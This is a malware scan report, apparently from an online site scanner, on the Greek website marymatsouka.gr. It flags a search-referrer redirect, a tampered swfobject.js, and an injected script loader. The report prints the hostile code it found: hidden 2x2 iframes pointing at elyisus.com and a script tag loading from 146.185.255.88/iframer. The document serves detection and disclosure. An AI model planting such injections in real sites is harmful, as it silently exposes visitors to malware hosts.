Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://marymatsouka.gr/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: marymatsouka.gr Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate, max-age=0 Connection: close Date: Wed, 27 Aug 2014 15:42:22 GMT Location: http://elyisus.com/hmbs.html Server: LiteSpeed Content-Length: 1148 Content-Type: text/html X-Powered-By: PleskLin | malicious |
Scanned pages/files
Request | Server response | Status |
http://marymatsouka.gr/ | 200 OK Content-Length: 1603 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmbs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html> | ||
http://marymatsouka.gr/swfobject.js | 200 OK Content-Length: 7024 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1 document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmbs.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmbs.html> | ||
http://marymatsouka.gr/js/swfforcesize.js | 200 OK Content-Length: 2679 Content-Type: text/javascript | suspicious |
Suspicious code found <script type="text/javascript" src="http://146.185.255.88/iframer/generate.php?domain=kolo.ch &type=js"></script> | ||
http://marymatsouka.gr/test404page.js | 404 Not Found Content-Length: 1148 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=marymatsouka.gr
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://marymatsouka.gr/
Result: marymatsouka.gr is not infected or malware details are not published yet.